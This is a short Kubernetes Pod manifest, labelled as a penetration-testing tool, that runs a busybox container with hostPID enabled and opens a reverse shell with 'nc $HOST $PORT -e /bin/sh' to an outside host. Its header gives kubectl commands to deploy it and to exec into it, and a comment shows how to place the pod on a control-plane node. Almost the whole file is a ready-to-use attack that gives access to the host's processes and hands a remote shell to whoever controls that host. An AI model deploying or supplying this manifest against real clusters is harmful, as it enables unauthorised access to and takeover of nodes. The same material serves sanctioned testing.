###########################################################
## Deploy: kubectl -n [namespace] apply -f pod-hostpid.yaml 
## Access: kubectl -n [namespace] exec -it pod-hostpid -- bash
## Remove: kubectl -n [namespace] delete pod-hostpid
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-hostpid-revshell
  labels:
    app: pentest
spec:
  hostPID: true
  containers:
  - image: busybox
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "nc $HOST $PORT  -e /bin/sh;" ]
    imagePullPolicy: IfNotPresent
    name: hostpid-revshell
    #nodeName: control-plane-node-name # Uncomment and change to control node name to try and schedule pod on control-plane node
